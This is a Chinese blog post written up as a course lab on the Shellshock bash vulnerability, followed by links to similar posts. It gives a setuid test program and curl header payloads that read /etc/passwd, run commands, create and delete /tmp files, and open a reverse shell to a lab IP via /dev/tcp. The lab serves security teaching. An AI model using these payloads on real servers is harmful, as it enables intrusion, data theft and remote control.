软件安全课程实验2 Shellshock Attack lab

已于 2022-01-27 13:39:39 修改
阅读量3.9k 收藏 3
点赞数
分类专栏: 软件安全 文章标签: 安全 bash linux
于 2022-01-27 12:56:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zino00/article/details/122715908
版权

Shellshock_Attack_lab

个人博客地址

task 1

//vul.c
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
void main(){
	setuid(geteuid());
	system("/bin/ls -l");
}

首先准备有漏洞的程序vul.c

然后我们编译运行,并将其变成一个set-UID程序

因为Ubuntu20.04中/bin/sh指向/bin/dash,而这个程序没有shellshock漏洞,所以需要更改符号链接,采用命令

sudo ln -sf /bin/bash_shellshock /bin/sh

同时我们发现20.04中/bin文件夹下没有bash_shellshock文件,所以我们需要sudo su进入root后自己cp一下。

我们定义一个shell变量foo并输出它,这样当运行set-UID程序(vul)时,shell变量会变成子进程的环境变量。由于system函数的原因,Bash会被调用,它监测到环境变量foo中存放了一个环境声明,因此会解析该声明,由于逻辑解析的漏洞,它最终会执行放在末尾的/bin/sh指令,所以我之后会成功进入一个具有root权限的shell程序。

image-20211027172958405

image-20211027173023492

将链接改回去后再次执行vul,我们发现程序正常,没有被攻击。

image-20211027174008884

task 2

task 2.A: Using brower

image-20211027180800482

image-20211027180830505

Apache服务器会从http请求头中获取信息,赋值给CGI程序的环境变量。

task 2.B Using curl

curl -v www.seedlab-shellshock.com/cgi-bin/getenv.cgi

-v 打印出http请求头

image-20211028162819689

curl -A "my data" -v www.seedlab-shellshock.com/cgi-bin/getenv.cgi

-A 设置User-Agent

image-20211028162913084

curl -e "my data" -v www.seedlab-shellshock.com/cgi-bin/getenv.cgi

-e 设置Referer字段

image-20211028163009475

curl -H "AAAAAA: BBBBBB" -v www.seedlab-shellshock.com/cgi-bin/getenv.cgi

-H 设置额外头字段

image-20211028163108646

task 3

Task 3.A:

  • Get the server to send back the content of the /etc/passwd file.

利用了-A修改User-Agent字段

执行命令

curl -A "() { echo hello; }; echo Content_type: text/plain; echo; /bin/cat /etc/passwd" http://www.seedlab-shellshock.com/cgi-bin/vul.cgi

image-20211028165749466

Task 3.B:

Get the server to tell you its process’ user ID. Y ou can use the /bin/id command to print out the ID information.

利用-e修改Referer字段来获取ID

执行命令

curl -e "() { echo hello; }; echo Content_type: text/plain; echo; /bin/id" http://www.seedlab-shellshock.com/cgi-bin/vul.cgi

image-20211028170325981

Task 3.C:

Get the server to create a file inside the /tmp folder. Y ou need to get into the container to see whether the file is created or not, or use another Shellshock attack to list the /tmp folder.

image-20211028172005730

利用-H创建额外头字段

查看tmp

curl -H "test: () { echo hello; }; echo Content_type: text/plain; echo; /bin/ls /tmp " http://www.seedlab-shellshock.com/cgi-bin/vul.cgi

创建test

curl -H "test: () { echo hello; }; echo Content_type: text/plain; echo; /bin/touch /tmp/test " http://www.seedlab-shellshock.com/cgi-bin/vul.cgi

image-20211028193945048

Task 3.D:

Get the server to delete the file that you just created inside the /tmp folder

删除test

curl -H "test: () { echo hello; }; echo Content_type: text/plain; echo; /bin/rm /tmp/test " http://www.seedlab-shellshock.com/cgi-bin/vul.cgi

image-20211028194013384

Q1:不能打开/etc/shadow,因为只是www-data权限,权限不够,需要root权限

Q2:不能成功,不能成功将带空格的字符串设置为环境变量,所以不能攻击成功

test 4

nc -lvnp 9090

image-20211028205201563

curl -A "() { echo hello;}; echo Content_type: text/plain; echo; echo; /bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1" http://10.9.0.80/cgi-bin/vul.cgi

image-20211028205013091

image-20211028205206476

test 5

新建一个vul.cgi修改为bash后,重新dcbuild一个容器,后再次执行攻击,发现攻击无法成功。因为bash填补了shellshock漏洞,所以无法攻击成功。

image-20211028211429143

信息安全 SEED Lab2 Shellshock Attack
crazyliu的博客
04-09 854
1. Task 1 这部分主要是要求你将后面的攻击在两个版本上进行,一个是打了补丁的版本,另一个是有漏洞的版本,对比结果差异 这部分我不在此展开,而是留到每部分进行,并进行对比分析。 2. Task 2 这部分主要写一个 cgi 脚本,并未涉及到攻击 主要是在/usr/lib/cgi-bin 下创建一个 cgi 脚本 并配置好权限及测试。 1. 有漏洞shell版本 cgi脚本内容如下: #!/bin/bash_shellshock echo "Content-type: tex..
漏洞分析Shellshock Attack Lab(自用,记录)
weixin_48392428的博客
07-05 1332
Shellshock Attack Lab1. Overview2. Lab TasksTask 1: Attack CGI programsTask 2ATask 2BTask 2CTask3 问题 1. Overview 2014 年 9 月 24 日,发现了 Bash 中的一个严重漏洞 Shellshock,这个漏洞可以用于许多系统,可以远程启动,也可以从本地机器启动。在这个实验中,学生们需要研究这种攻击,这样他们才能了解Shellshock 的脆弱性。学习本实验室的目的是让学生对这种有趣的攻击有第一
Shellshock Attack Lab
qq_39249347的博客
07-05 599
预备环境 Ubuntu16.04 存在shellshock漏洞的bash程序。 预备知识 Bash源代码中的错误 if(privmode==0 && read_but_dont_execute ==0 && STREQN("() {",string,4){ ... parse_and_excute(temp_string,name,SEVAL_NONINT|SEVAL_NOHIST); } Bash检查环境变量是否以"() { "开头,以确定是否需要把它转换为函数
软件安全实验
qq_44047806的博客
04-06 3891
一、基本概念 1.缓冲区: 缓冲区(buffer)这个中文译意源自当计算机的高速部件与低速部件通讯时,必须将高速部件的输出暂存到某处,以保证高速部件与低速部件相吻合. 后来这个意思被扩展了,成为"临时存贮区"的意思。 一般缓冲区用于跟外设接口,比如输入的键盘、输出到屏幕、输出到文件、串并口、网络等等,主要原因是CPU工作速度和总线传送速度远远快于这些外设的处理速度, 为了不让CPU处于长时间等待状态,通常采用中断方式来处理,但为了提高效率,减少中断的次数,cpu一次把能处理的一批数据传送给外设,然而外设又不
Shellshock Lab
Yuhan2001的CSDN博客
12-05 4254
软件安全课程实验shellshock; 版本:SeedUbuntu20.04; 课本:计算机安全导论:深度实践;
SEED Labs – Shellshock Attack Lab
qq_43252441的博客
12-22 1435
Task 1: Experimenting with Bash Function Ubuntu 16.04中的Bash程序已被修补,因此它不再容易受到Shellshock的攻击。为了本实验的目的,我们在/bin文件夹中安装了易受攻击的Bash版本。它的名字叫bash_shellshock。 我们需要在任务中使用此Bash。 请运行此易受攻击的版本的Bash,如下所示,然后设计一个实验来验证该Bash是否易受攻击Shellshock攻击与否。 $ /bin/bash_shellshock 在补丁版本的bas
Shellshock Attack SEED-LAB
qq_51660793的博客
10-24 1595
shellshock seed-lab
网络安全工具大合集
dengliang7440的博客
03-29 3042
导语:这里有一份很棒的黑客工具列表可以提供给黑客,渗透测试人员,安全研究人员。它的目标是收集,分类,让你容易找到想要的工具,创建一个工具集,你可以一键检查和更新。这里有一份很棒的黑客工具列表可以提供给黑客,渗透测试人员,安全研究人员。它的目标是收集,分类,让你容易找到想要的工具,创建一个工具集,你可以一键检查和更新。你可以通过以下命令检查所有的工具:git clone --recursi...
Shellshock_Attack
大草的博客
04-12 441
bash的漏洞介绍 符合利用漏洞的CGI 使用reverse shell
shellshock-Attack-Lab
qq_49005782的博客
11-07 4176
shellshock Attack Lab 实验概述 实验背景 2014 年 9 月 24 日,发现了 Bash 中的一个严重漏洞 Shellshock,这个漏洞可以用于许多系统,可以远程启动,也可以从本地机器启动。在这个实验中,学生们需要研究这种攻击,这样才能了解Shellshock 的脆弱性. 此次实验包括以下四个内容: Shellshock Environment variables Function definition in bash Apache and CGI programs 实验
LAB 2 Shellshock Attack
qq_39411845的博客
07-18 553
Shellshock Attack利用Shellshock攻击Set-UID程序Web服务器调用CGI程序Task 1: Experimenting with Bash FunctionTask 2: Setting up CGI programsTask 3: Passing Data to Bash via Environment VariableTask 4: Launching the Shellshock AttackTask 5: Getting a Reverse Shell via Shel
【信息安全-科软课程Lab3 Shellshock Attack
weixin_41950078的博客
04-13 970
1.0 前言 2014年9月24日,发现了Bash的一个严重漏洞。昵称为Shellshock的这个漏洞可以利用许多系统,并从远程或本地机器上启动。在这个实验室里,学生们需要研究这种攻击,这样他们就能了解Shellshock的弱点。这个实验的学习目标是让学生对这种有趣的攻击有第一手的经验,了解它是如何运作的,并思考我们能从这种攻击中学到什么。该实验室的第一个版本是在2014年9月29日开发的,也就是袭击被报道的五天之后。这是2014年9月30日在我们计算机安全课上分配给学生的。SEED项目的一个重要任务是迅
Shellshock漏洞回顾与分析测试
xiaoshan812613234的专栏
12-25 1513
0x00 漏洞概述 很多人或许对2014上半年发生的安全问题“心脏流血”(Heartbleed Bug)事件记忆颇深,2014年9月,又出现了另外一个“毁灭级”的漏洞——Bash软件安全漏洞。这个漏洞由法国GNU/Linux爱好者Stéphane Chazelas所发现。随后,美国电脑应急响应中心(US-CERT)、红帽以及多家从事安全的公司于周三(北京时间2014年9月24日)发出警告
ShellShock 攻击实验
weixin_30652879的博客
05-22 350
20122218朱玉琦 1. 环境搭建 以root权限安装4.1版bash(4.2版本以上的漏洞已经被堵上了) bash4.1 下载地址:http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz(伪) 下载 # wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz 安装 # tar xf ba...
SEED实验系列:ShellShock 攻击实验
weixin_33897722的博客
04-21 707
2019独角兽企业重金招聘Python工程师标准>>> ...
Race Condition Vulnerability Lab操作系统实验
l4kjih3gfe2dcba1的博客
04-01 1239
Race Condition Vulnerability Lab操作系统实验实验准备Task1 实验准备 有TOCTTOU竞态条件漏洞的程序(vulp.c) /* vulp.c */ #include <stdio.h> #include<unistd.h> int main() { char * fn = "/tmp/XYZ"; char buffer[60]; FILE *fp; /* get user input */ scanf("%50s", buffer );
软件安全实验-SEEDubuntu-Shellshock Attack Lab
Luobuda的博客
11-30 2482
实验要求 Task 1 Task 2 Task 3 Task 4 Task 5 Task 6 实验环境 SEEDUbuntu(Ubuntu 16.04) 实验步骤 Task1 Bash的版本:在本书提供的SEED Ubuntu 16.04虚拟机中,有两个版本的Bash程序位于/bin目录中。一个版本就叫Bash,这个版本已经打了补丁,所以不会受Shellshock攻击的影响。终端中运行的shell程序就是这个安全Bash版本,它在函数传递的行为方面做了改变。另外一个版本叫bash_shells
漏洞挖掘——实验12 Cross-Site Scripting (XSS) Attack Lab
一半西瓜的博客
04-17 3459
题目 Lab Cross-Site Scripting (XSS) Attack Lab Pre 1、名词解释:double free,UAF (Use After Free),RELRO(Relocation Read Only), Dangling pointer,Control Flow Guard 2、阅读下面这三篇文章: UAF学习--原理及利用 https://www.cnb...
shellshock
最新发布
03-16
Shellshock是一个严重的计算机安全漏洞,影响了许多操作系统和应用程序。它允许攻击者通过特殊构造的命令来执行恶意代码,从而控制受感染的系统。Shellshock漏洞最初被发现于2014年,但仍然是一个重要的安全问题。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值